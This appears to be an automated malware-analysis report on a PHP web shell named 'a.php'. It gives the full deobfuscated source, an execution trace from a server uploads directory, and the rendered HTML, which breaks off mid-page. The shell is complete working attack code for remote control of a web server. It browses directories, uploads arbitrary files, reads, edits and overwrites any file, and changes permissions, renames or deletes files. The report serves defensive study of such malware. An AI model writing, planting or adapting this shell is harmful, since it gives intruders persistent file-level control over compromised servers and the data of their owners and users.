PHP Malware Analysis

a.php

md5: a7b6919283b74d6800cd4afb6c6d551c

Jump to:

Screenshot


Attributes

Environment

Files

Input

Title

URLs


Deobfuscated PHP code




<?php 
error_reporting(0);
set_time_limit(0);
if (get_magic_quotes_gpc()) {
    foreach ($_POST as $key => $value) {
        $_POST[$key] = stripslashes($value);
    }
}
echo "<!DOCTYPE HTML>\r\n<html>\r\n<head>\r\n<link href=\"\" rel=\"stylesheet\" type=\"text/css\">\r\n<title>Shoope</title>\r\n<style>\r\nbody{\r\nfont-family: \"Arial\", cursive;\r\nbackground-color: black;\r\ncolor:white;\r\n}\r\n#content tr:hover{\r\nbackground-color: pink;\r\ntext-shadow:0px 0px 10px #fff;\r\n}\r\n#content .first{\r\nbackground-color: transparant;\r\n}\r\ntable{\r\nborder: 1px #55da7b  solid;\r\n}\r\na{\r\ncolor:white;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor:blue;\r\ntext-shadow:0px 0px 10px #ffffff;\r\n}\r\ninput,select,textarea{\r\nborder: 1px #000000 solid;\r\n-moz-border-radius: 5px;\r\n-webkit-border-radius:5px;\r\nborder-radius:5px;\r\n}\r\n.pembungkus {\r\n\twidth: 1000px;\r\n\tborder: 1px #55da7b solid;\r\n\tmargin-buttom: 20px;\r\n\tmargin: auto;\r\n\tpadding: 5px;\r\n}\r\n</style>\r\n\r\n</head>\r\n<body>\r\n<h1><center>\r\n <link href=\"http://fonts.googleapis.com/css?family=Iceland\" rel=\"stylesheet\" type=\"text/css\"> <em>\r\n   <font face=\"iceland\">\r\n<br>\r\n<font color=\"red\"></font></center></h1><br>\r\n<script type=\"text/javascript\" src=\"https://www.cssscript.com/demo/minimalist-falling-snow-effect-with-pure-javascript-snow-js/snow.js\"></script>\r\n<script type=\"text/javascript\" src=\"https://www.cssscript.com/demo/minimalist-falling-snow-effect-with-pure-javascript-snow-js/snow.js\"></script>\r\n<script type=\"text/javascript\" src=\"https://www.cssscript.com/demo/minimalist-falling-snow-effect-with-pure-javascript-snow-js/snow.js\"></script>\r\n<script type=\"text/javascript\" src=\"https://www.cssscript.com/demo/minimalist-falling-snow-effect-with-pure-javascript-snow-js/snow.js\"></script>\r\n\r\n\r\n<br><hr color=\" #55da7b \" size=\"3px\" width=1000px\" ><div class=\"pembungkus\"><br>\r\n<font color=\"white\">Path :</font> ";
if (isset($_GET['path'])) {
    $path = $_GET['path'];
} else {
    $path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
    if ($pat == '' && $id == 0) {
        $a = true;
        echo "<a href=\"?path=/\">/</a>";
        continue;
    }
    if ($pat == '') {
        continue;
    }
    echo "<a href=\"?path=";
    for ($i = 0; $i <= $id; $i++) {
        echo "{$paths[$i]}";
        if ($i != $id) {
            echo "/";
        }
    }
    echo '">' . $pat . '</a>/';
}
echo "</td></tr><tr><td>";
if (isset($_FILES['file'])) {
    if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
        echo "<font color=\"lime\">BERHASIL COK</font><br />";
    } else {
        echo "<font color=\"pink\">GAGAL COK</font><br/>";
    }
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\">\r\n<font color=\"white\">File Upload :</font> <input type=\"file\" name=\"file\" />\r\n<input type=\"submit\" value=\"upload\" />\r\n</form>\r\n</td></tr>";
if (isset($_GET['filesrc'])) {
    echo "<tr><td>Current File : ";
    echo $_GET['filesrc'];
    echo "</tr></td></table><br />";
    echo '<pre>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre>';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
    echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
    if ($_POST['opt'] == 'chmod') {
        if (isset($_POST['perm'])) {
            if (chmod($_POST['path'], $_POST['perm'])) {
                echo "<font color=\"lime\">Change Permission Berhasil</font><br/>";
            } else {
                echo "<font color=\"pink\">Change Permission Gagal</font><br />";
            }
        }
        echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
    } elseif ($_POST['opt'] == 'rename') {
        if (isset($_POST['newname'])) {
            if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
                echo "<font color=\"lime\">Ganti Nama Berhasil</font><br/>";
            } else {
                echo "<font color=\"pink\">Ganti Nama Gagal</font><br />";
            }
            $_POST['name'] = $_POST['newname'];
        }
        echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
    } elseif ($_POST['opt'] == 'edit') {
        if (isset($_POST['src'])) {
            $fp = fopen($_POST['path'], 'w');
            if (fwrite($fp, $_POST['src'])) {
                echo "<font color=\"lime\">Berhasil Edit File</font><br/>";
            } else {
                echo "<font color=\"pink\">Gagal Edit File</font><br/>";
            }
            fclose($fp);
        }
        echo '<form method="POST">
<textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Save" />
</form>';
    }
    echo "</center>";
} else {
    echo "</table><br/><center>";
    if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
        if ($_POST['type'] == 'dir') {
            if (rmdir($_POST['path'])) {
                echo "<font color=\"lime\">Directory Terhapus</font><br/>";
            } else {
                echo "<font color=\"pink\">Directory Gagal Terhapus                                                                                                                                                                                                                                                                                             </font><br/>";
            }
        } elseif ($_POST['type'] == 'file') {
            if (unlink($_POST['path'])) {
                echo "<font color=\"lime\">File Terhapus</font><br/>";
            } else {
                echo "<font color=\"pink\">File Gagal Dihapus</font><br/>";
            }
        }
    }
    echo "</center>";
    $scandir = scandir($path);
    echo "<br><div id=\"content\"><table width=\"1000\"  border=\"5\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr class=\"first\">\r\n<td><center>JENENG</peller></center></td>\r\n<td><center>UKURAN</peller></center></td>\r\n<td><center>ijin</peller></center></td>\r\n<td><center>ngutek-utek</peller></center></td>\r\n</tr>";
    foreach ($scandir as $dir) {
        if (!is_dir($path . '/' . $dir) || $dir == '.' || $dir == '..') {
            continue;
        }
        echo '<tr>
<td><a href="?path=' . $path . '/' . $dir . '">' . $dir . '</a></td>
<td><center>--</center></td>
<td><center>';
        if (is_writable($path . '/' . $dir)) {
            echo "<font color=\"lime\">";
        } elseif (!is_readable($path . '/' . $dir)) {
            echo "<font color=\"pink\">";
        }
        echo perms($path . '/' . $dir);
        if (is_writable($path . '/' . $dir) || !is_readable($path . '/' . $dir)) {
            echo "</font>";
        }
        echo '</center></td>
<td><center><form method="POST" action="?option&path=' . $path . '">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
</select>
<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="' . $dir . '">
<input type="hidden" name="path" value="' . $path . '/' . $dir . '">
<input type="submit" value=">">
</form></center></td>
</tr>';
    }
    echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
    foreach ($scandir as $file) {
        if (!is_file($path . '/' . $file)) {
            continue;
        }
        $size = filesize($path . '/' . $file) / 1024;
        $size = round($size, 3);
        if ($size >= 1024) {
            $size = round($size / 1024, 2) . ' MB';
        } else {
            $size .= ' KB';
        }
        echo '<tr>
<td><a href="?filesrc=' . $path . '/' . $file . '&path=' . $path . '">' . $file . '</a></td>
<td><center>' . $size . '</center></td>
<td><center>';
        if (is_writable($path . '/' . $file)) {
            echo "<font color=\"lime\">";
        } elseif (!is_readable($path . '/' . $file)) {
            echo "<font color=\"pink\">";
        }
        echo perms($path . '/' . $file);
        if (is_writable($path . '/' . $file) || !is_readable($path . '/' . $file)) {
            echo "</font>";
        }
        echo '</center></td>
<td><center><form method="POST" action="?option&path=' . $path . '">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="' . $file . '">
<input type="hidden" name="path" value="' . $path . '/' . $file . '">
<input type="submit" value=">">
</form></center></td>
</tr>';
    }
    echo "</table>\r\n</div>";
}
echo "<center><br/><br<br<br</center>\r\n</div><hr color=\" #55da7b \" size=\"3px\" width=1000px\" ></body>\r\n</html>";
function perms($file)
{
    $perms = fileperms($file);
    if (($perms & 0xc000) == 0xc000) {
        // Socket
        $info = 's';
    } elseif (($perms & 0xa000) == 0xa000) {
        // Symbolic Link
        $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) {
        // Regular
        $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) {
        // Block special
        $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) {
        // Directory
        $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) {
        // Character special
        $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) {
        // FIFO pipe
        $info = 'p';
    } else {
        // Unknown
        $info = 'u';
    }
    // Owner
    $info .= $perms & 0x100 ? 'r' : '-';
    $info .= $perms & 0x80 ? 'w' : '-';
    $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
    // Group
    $info .= $perms & 0x20 ? 'r' : '-';
    $info .= $perms & 0x10 ? 'w' : '-';
    $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
    // World
    $info .= $perms & 0x4 ? 'r' : '-';
    $info .= $perms & 0x2 ? 'w' : '-';
    $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
    return $info;
}

Execution traces

data/traces/a7b6919283b74d6800cd4afb6c6d551c_trace-1676258049.8599.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:14:35.757754]
1	0	1	0.000171	393464
1	3	0	0.000466	442152	{main}	1		/var/www/html/uploads/a.php	0	0
2	4	0	0.000485	442152	error_reporting	0		/var/www/html/uploads/a.php	5	1	0
2	4	1	0.000501	442192
2	4	R			22527
2	5	0	0.000514	442152	set_time_limit	0		/var/www/html/uploads/a.php	6	1	0
2	5	1	0.000529	442216
2	5	R			FALSE
2	6	0	0.000543	442184	get_magic_quotes_gpc	0		/var/www/html/uploads/a.php	8	0
2	6	1	0.000555	442184
2	6	R			FALSE
2	7	0	0.000569	442184	getcwd	0		/var/www/html/uploads/a.php	75	0
2	7	1	0.000583	442232
2	7	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/a.php	75	$path = '/var/www/html/uploads'
2	8	0	0.000611	442232	str_replace	0		/var/www/html/uploads/a.php	77	3	'\\'	'/'	'/var/www/html/uploads'
2	8	1	0.000627	442328
2	8	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/a.php	77	$path = '/var/www/html/uploads'
2	9	0	0.000651	442232	explode	0		/var/www/html/uploads/a.php	78	2	'/'	'/var/www/html/uploads'
2	9	1	0.000665	442808
2	9	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/a.php	78	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/a.php	80	$id = 0
1		A						/var/www/html/uploads/a.php	82	$a = TRUE
1		A						/var/www/html/uploads/a.php	80	$id = 1
1		A						/var/www/html/uploads/a.php	88	$i = 0
1		A						/var/www/html/uploads/a.php	88	$i++
1		A						/var/www/html/uploads/a.php	88	$i++
1		A						/var/www/html/uploads/a.php	80	$id = 2
1		A						/var/www/html/uploads/a.php	88	$i = 0
1		A						/var/www/html/uploads/a.php	88	$i++
1		A						/var/www/html/uploads/a.php	88	$i++
1		A						/var/www/html/uploads/a.php	88	$i++
1		A						/var/www/html/uploads/a.php	80	$id = 3
1		A						/var/www/html/uploads/a.php	88	$i = 0
1		A						/var/www/html/uploads/a.php	88	$i++
1		A						/var/www/html/uploads/a.php	88	$i++
1		A						/var/www/html/uploads/a.php	88	$i++
1		A						/var/www/html/uploads/a.php	88	$i++
1		A						/var/www/html/uploads/a.php	80	$id = 4
1		A						/var/www/html/uploads/a.php	88	$i = 0
1		A						/var/www/html/uploads/a.php	88	$i++
1		A						/var/www/html/uploads/a.php	88	$i++
1		A						/var/www/html/uploads/a.php	88	$i++
1		A						/var/www/html/uploads/a.php	88	$i++
1		A						/var/www/html/uploads/a.php	88	$i++
2	10	0	0.000898	442736	scandir	0		/var/www/html/uploads/a.php	179	1	'/var/www/html/uploads'
2	10	1	0.000935	443352
2	10	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'a.php', 4 => 'data', 5 => 'prepend.php']
1		A						/var/www/html/uploads/a.php	179	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'a.php', 4 => 'data', 5 => 'prepend.php']
2	11	0	0.000973	443368	is_dir	0		/var/www/html/uploads/a.php	189	1	'/var/www/html/uploads/.'
2	11	1	0.000989	443432
2	11	R			TRUE
2	12	0	0.001002	443400	is_dir	0		/var/www/html/uploads/a.php	189	1	'/var/www/html/uploads/..'
2	12	1	0.001017	443448
2	12	R			TRUE
2	13	0	0.001030	443408	is_dir	0		/var/www/html/uploads/a.php	189	1	'/var/www/html/uploads/.htaccess'
2	13	1	0.001044	443448
2	13	R			FALSE
2	14	0	0.001057	443408	is_dir	0		/var/www/html/uploads/a.php	189	1	'/var/www/html/uploads/a.php'
2	14	1	0.001070	443448
2	14	R			FALSE
2	15	0	0.001084	443408	is_dir	0		/var/www/html/uploads/a.php	189	1	'/var/www/html/uploads/data'
2	15	1	0.001097	443448
2	15	R			TRUE
2	16	0	0.001111	443408	is_writable	0		/var/www/html/uploads/a.php	194	1	'/var/www/html/uploads/data'
2	16	1	0.001129	443448
2	16	R			TRUE
2	17	0	0.001143	443408	perms	1		/var/www/html/uploads/a.php	196	1	'/var/www/html/uploads/data'
3	18	0	0.001156	443408	fileperms	0		/var/www/html/uploads/a.php	256	1	'/var/www/html/uploads/data'
3	18	1	0.001169	443448
3	18	R			16895
2		A						/var/www/html/uploads/a.php	256	$perms = 16895
2		A						/var/www/html/uploads/a.php	272	$info = 'd'
2		A						/var/www/html/uploads/a.php	285	$info .= 'r'
2		A						/var/www/html/uploads/a.php	286	$info .= 'w'
2		A						/var/www/html/uploads/a.php	289	$info .= 'x'
2		A						/var/www/html/uploads/a.php	292	$info .= 'r'
2		A						/var/www/html/uploads/a.php	293	$info .= 'w'
2		A						/var/www/html/uploads/a.php	296	$info .= 'x'
2		A						/var/www/html/uploads/a.php	299	$info .= 'r'
2		A						/var/www/html/uploads/a.php	300	$info .= 'w'
2		A						/var/www/html/uploads/a.php	303	$info .= 'x'
2	17	1	0.001294	443448
2	17	R			'drwxrwxrwx'
2	19	0	0.001308	443408	is_writable	0		/var/www/html/uploads/a.php	197	1	'/var/www/html/uploads/data'
2	19	1	0.001323	443448
2	19	R			TRUE
2	20	0	0.001337	443416	is_dir	0		/var/www/html/uploads/a.php	189	1	'/var/www/html/uploads/prepend.php'
2	20	1	0.001352	443464
2	20	R			FALSE
2	21	0	0.001365	443408	is_file	0		/var/www/html/uploads/a.php	216	1	'/var/www/html/uploads/.'
2	21	1	0.001379	443432
2	21	R			FALSE
2	22	0	0.001392	443400	is_file	0		/var/www/html/uploads/a.php	216	1	'/var/www/html/uploads/..'
2	22	1	0.001406	443448
2	22	R			FALSE
2	23	0	0.001419	443408	is_file	0		/var/www/html/uploads/a.php	216	1	'/var/www/html/uploads/.htaccess'
2	23	1	0.001433	443448
2	23	R			TRUE
2	24	0	0.001446	443408	filesize	0		/var/www/html/uploads/a.php	217	1	'/var/www/html/uploads/.htaccess'
2	24	1	0.001462	443448
2	24	R			64
1		A						/var/www/html/uploads/a.php	217	$size = 0.0625
2	25	0	0.001491	443352	round	0		/var/www/html/uploads/a.php	218	2	0.0625	3
2	25	1	0.001505	443424
2	25	R			0.063
1		A						/var/www/html/uploads/a.php	218	$size = 0.063
1		A						/var/www/html/uploads/a.php	222	$size = '0.063 KB'
2	26	0	0.001542	443448	is_writable	0		/var/www/html/uploads/a.php	229	1	'/var/www/html/uploads/.htaccess'
2	26	1	0.001558	443488
2	26	R			FALSE
2	27	0	0.001572	443448	is_readable	0		/var/www/html/uploads/a.php	230	1	'/var/www/html/uploads/.htaccess'
2	27	1	0.001586	443488
2	27	R			TRUE
2	28	0	0.001600	443448	perms	1		/var/www/html/uploads/a.php	231	1	'/var/www/html/uploads/.htaccess'
3	29	0	0.001612	443448	fileperms	0		/var/www/html/uploads/a.php	256	1	'/var/www/html/uploads/.htaccess'
3	29	1	0.001625	443488
3	29	R			33188
2		A						/var/www/html/uploads/a.php	256	$perms = 33188
2		A						/var/www/html/uploads/a.php	266	$info = '-'
2		A						/var/www/html/uploads/a.php	285	$info .= 'r'
2		A						/var/www/html/uploads/a.php	286	$info .= 'w'
2		A						/var/www/html/uploads/a.php	289	$info .= '-'
2		A						/var/www/html/uploads/a.php	292	$info .= 'r'
2		A						/var/www/html/uploads/a.php	293	$info .= '-'
2		A						/var/www/html/uploads/a.php	296	$info .= '-'
2		A						/var/www/html/uploads/a.php	299	$info .= 'r'
2		A						/var/www/html/uploads/a.php	300	$info .= '-'
2		A						/var/www/html/uploads/a.php	303	$info .= '-'
2	28	1	0.001741	443488
2	28	R			'-rw-r--r--'
2	30	0	0.001755	443448	is_writable	0		/var/www/html/uploads/a.php	232	1	'/var/www/html/uploads/.htaccess'
2	30	1	0.001770	443488
2	30	R			FALSE
2	31	0	0.001784	443448	is_readable	0		/var/www/html/uploads/a.php	232	1	'/var/www/html/uploads/.htaccess'
2	31	1	0.001798	443488
2	31	R			TRUE
2	32	0	0.001812	443448	is_file	0		/var/www/html/uploads/a.php	216	1	'/var/www/html/uploads/a.php'
2	32	1	0.001827	443488
2	32	R			TRUE
2	33	0	0.001839	443448	filesize	0		/var/www/html/uploads/a.php	217	1	'/var/www/html/uploads/a.php'
2	33	1	0.001851	443488
2	33	R			9386
1		A						/var/www/html/uploads/a.php	217	$size = 9.166015625
2	34	0	0.001875	443352	round	0		/var/www/html/uploads/a.php	218	2	9.166015625	3
2	34	1	0.001889	443424
2	34	R			9.166
1		A						/var/www/html/uploads/a.php	218	$size = 9.166
1		A						/var/www/html/uploads/a.php	222	$size = '9.166 KB'
2	35	0	0.001924	443448	is_writable	0		/var/www/html/uploads/a.php	229	1	'/var/www/html/uploads/a.php'
2	35	1	0.001939	443488
2	35	R			FALSE
2	36	0	0.001952	443448	is_readable	0		/var/www/html/uploads/a.php	230	1	'/var/www/html/uploads/a.php'
2	36	1	0.001967	443488
2	36	R			TRUE
2	37	0	0.001980	443448	perms	1		/var/www/html/uploads/a.php	231	1	'/var/www/html/uploads/a.php'
3	38	0	0.001991	443448	fileperms	0		/var/www/html/uploads/a.php	256	1	'/var/www/html/uploads/a.php'
3	38	1	0.002004	443488
3	38	R			33204
2		A						/var/www/html/uploads/a.php	256	$perms = 33204
2		A						/var/www/html/uploads/a.php	266	$info = '-'
2		A						/var/www/html/uploads/a.php	285	$info .= 'r'
2		A						/var/www/html/uploads/a.php	286	$info .= 'w'
2		A						/var/www/html/uploads/a.php	289	$info .= '-'
2		A						/var/www/html/uploads/a.php	292	$info .= 'r'
2		A						/var/www/html/uploads/a.php	293	$info .= 'w'
2		A						/var/www/html/uploads/a.php	296	$info .= '-'
2		A						/var/www/html/uploads/a.php	299	$info .= 'r'
2		A						/var/www/html/uploads/a.php	300	$info .= '-'
2		A						/var/www/html/uploads/a.php	303	$info .= '-'
2	37	1	0.002130	443488
2	37	R			'-rw-rw-r--'
2	39	0	0.002228	443448	is_writable	0		/var/www/html/uploads/a.php	232	1	'/var/www/html/uploads/a.php'
2	39	1	0.002250	443488
2	39	R			FALSE
2	40	0	0.002264	443448	is_readable	0		/var/www/html/uploads/a.php	232	1	'/var/www/html/uploads/a.php'
2	40	1	0.002278	443488
2	40	R			TRUE
2	41	0	0.002304	443560	is_file	0		/var/www/html/uploads/a.php	216	1	'/var/www/html/uploads/data'
2	41	1	0.002320	443600
2	41	R			FALSE
2	42	0	0.002333	443568	is_file	0		/var/www/html/uploads/a.php	216	1	'/var/www/html/uploads/prepend.php'
2	42	1	0.002348	443616
2	42	R			TRUE
2	43	0	0.002361	443576	filesize	0		/var/www/html/uploads/a.php	217	1	'/var/www/html/uploads/prepend.php'
2	43	1	0.002374	443616
2	43	R			57
1		A						/var/www/html/uploads/a.php	217	$size = 0.0556640625
2	44	0	0.002398	443472	round	0		/var/www/html/uploads/a.php	218	2	0.0556640625	3
2	44	1	0.002412	443544
2	44	R			0.056
1		A						/var/www/html/uploads/a.php	218	$size = 0.056
1		A						/var/www/html/uploads/a.php	222	$size = '0.056 KB'
2	45	0	0.002448	443576	is_writable	0		/var/www/html/uploads/a.php	229	1	'/var/www/html/uploads/prepend.php'
2	45	1	0.002464	443616
2	45	R			FALSE
2	46	0	0.002477	443576	is_readable	0		/var/www/html/uploads/a.php	230	1	'/var/www/html/uploads/prepend.php'
2	46	1	0.002492	443616
2	46	R			TRUE
2	47	0	0.002505	443576	perms	1		/var/www/html/uploads/a.php	231	1	'/var/www/html/uploads/prepend.php'
3	48	0	0.002518	443576	fileperms	0		/var/www/html/uploads/a.php	256	1	'/var/www/html/uploads/prepend.php'
3	48	1	0.002532	443616
3	48	R			33261
2		A						/var/www/html/uploads/a.php	256	$perms = 33261
2		A						/var/www/html/uploads/a.php	266	$info = '-'
2		A						/var/www/html/uploads/a.php	285	$info .= 'r'
2		A						/var/www/html/uploads/a.php	286	$info .= 'w'
2		A						/var/www/html/uploads/a.php	289	$info .= 'x'
2		A						/var/www/html/uploads/a.php	292	$info .= 'r'
2		A						/var/www/html/uploads/a.php	293	$info .= '-'
2		A						/var/www/html/uploads/a.php	296	$info .= 'x'
2		A						/var/www/html/uploads/a.php	299	$info .= 'r'
2		A						/var/www/html/uploads/a.php	300	$info .= '-'
2		A						/var/www/html/uploads/a.php	303	$info .= 'x'
2	47	1	0.002648	443616
2	47	R			'-rwxr-xr-x'
2	49	0	0.002662	443576	is_writable	0		/var/www/html/uploads/a.php	232	1	'/var/www/html/uploads/prepend.php'
2	49	1	0.002680	443616
2	49	R			FALSE
2	50	0	0.002693	443576	is_readable	0		/var/www/html/uploads/a.php	232	1	'/var/www/html/uploads/prepend.php'
2	50	1	0.002708	443616
2	50	R			TRUE
1	3	1	0.002724	443512
			0.002758	326160
TRACE END   [2023-02-13 01:14:35.760371]


Generated HTML code

<html><head>
<link href="" rel="stylesheet" type="text/css">
<title>Shoope</title>
<style>
body{
font-family: "Arial", cursive;
background-color: black;
color:white;
}
#content tr:hover{
background-color: pink;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: transparant;
}
table{
border: 1px #55da7b  solid;
}
a{
color:white;
text-decoration: none;
}
a:hover{
color:blue;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
.pembungkus {
	width: 1000px;
	border: 1px #55da7b solid;
	margin-buttom: 20px;
	margin: auto;
	padding: 5px;
}
</style>

</head>
<body>
<h1><center>
 <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css"> <em>
   <font face="iceland">
<br>
<font color="red"></font></font></em></center></h1><em><font face="iceland"><br>
<script type="text/javascript" src="https://www.cssscript.com/demo/minimalist-falling-snow-effect-with-pure-javascript-snow-js/snow.js"></script><span id="flake0" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 16px; color: rgb(221, 221, 221); z-index: 1000; left: 857.466px; top: 2.4px;">•</span><span id="flake1" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 22px; color: rgb(238, 238, 238); z-index: 1000; left: 1203.1px; top: 165px;">•</span><span id="flake2" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 14px; color: rgb(238, 238, 238); z-index: 1000; left: 818.341px; top: 107.1px;">•</span><span id="flake3" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 23px; color: rgb(221, 221, 221); z-index: 1000; left: 131.618px; top: 58.65px;">•</span><span id="flake4" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 9px; color: rgb(221, 221, 221); z-index: 1000; left: 1157.93px; top: 94.5px;">•</span><span id="flake5" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 15px; color: rgb(221, 221, 221); z-index: 1000; left: 1446.85px; top: 279.25px;">•</span><span id="flake6" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 9px; color: rgb(238, 238, 238); z-index: 1000; left: 1695.51px; top: 51.3px;">•</span><span id="flake7" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 9px; color: rgb(221, 221, 221); z-index: 1000; left: 465.036px; top: 86.4px;">•</span><span id="flake8" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 20px; color: rgb(238, 238, 238); z-index: 1000; left: 549.569px; top: 198px;">•</span><span id="flake9" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 10px; color: rgb(221, 221, 221); z-index: 1000; left: 703.893px; top: 73.5px;">•</span><span id="flake10" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 18px; color: rgb(238, 238, 238); z-index: 1000; left: 1149.86px; top: 32.4px;">•</span><span id="flake11" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 14px; color: rgb(238, 238, 238); z-index: 1000; left: 1209.32px; top: 267.3px;">•</span><span id="flake12" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 15px; color: rgb(238, 238, 238); z-index: 1000; left: 185.962px; top: 141.75px;">•</span><span id="flake13" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 11px; color: rgb(238, 238, 238); z-index: 1000; left: 1494.59px; top: 113.85px;">•</span><span id="flake14" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 21px; color: rgb(221, 221, 221); z-index: 1000; left: 1.16664px; top: 88.2px;">•</span><span id="flake15" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 20px; color: rgb(238, 238, 238); z-index: 1000; left: 375.575px; top: 72px;">•</span><span id="flake16" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 9px; color: rgb(238, 238, 238); z-index: 1000; left: 1338.36px; top: 280.55px;">•</span><span id="flake17" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 12px; color: rgb(238, 238, 238); z-index: 1000; left: 514.439px; top: 19.8px;">•</span><span id="flake18" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 21px; color: rgb(238, 238, 238); z-index: 1000; left: 1163.17px; top: 198.45px;">•</span><span id="flake19" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 20px; color: rgb(221, 221, 221); z-index: 1000; left: 567.226px; top: 162px;">•</span><span id="flake20" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 12px; color: rgb(221, 221, 221); z-index: 1000; left: 145.9px; top: 138.6px;">•</span><span id="flake21" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 18px; color: rgb(221, 221, 221); z-index: 1000; left: 1667.1px; top: 86.4px;">•</span><span id="flake22" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 22px; color: rgb(238, 238, 238); z-index: 1000; left: 1036.51px; top: 23.1px;">•</span><span id="flake23" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 13px; color: rgb(221, 221, 221); z-index: 1000; left: 1549.22px; top: 252.35px;">•</span><span id="flake24" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 17px; color: rgb(238, 238, 238); z-index: 1000; left: 479.909px; top: 53.55px;">•</span><span id="flake25" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 21px; color: rgb(221, 221, 221); z-index: 1000; left: 1001.99px; top: 56.7px;">•</span><span id="flake26" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 13px; color: rgb(238, 238, 238); z-index: 1000; left: 1083.28px; top: 70.2px;">•</span><span id="flake27" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 8px; color: rgb(221, 221, 221); z-index: 1000; left: 539.62px; top: 290.6px;">•</span><span id="flake28" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 22px; color: rgb(221, 221, 221); z-index: 1000; left: 736.734px; top: 178.2px;">•</span><span id="flake29" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 10px; color: rgb(221, 221, 221); z-index: 1000; left: 1682.5px; top: 162.5px;">•</span><span id="flake30" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 16px; color: rgb(238, 238, 238); z-index: 1000; left: 47.3646px; top: 213.6px;">•</span><span id="flake31" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 17px; color: rgb(238, 238, 238); z-index: 1000; left: 281.734px; top: 56.1px;">•</span><span id="flake32" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 19px; color: rgb(238, 238, 238); z-index: 1000; left: 1104.4px; top: 74.1px;">•</span><span id="flake33" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 22px; color: rgb(238, 238, 238); z-index: 1000; left: 379.588px; top: 240.9px;">•</span><span id="flake34" style="cursor: 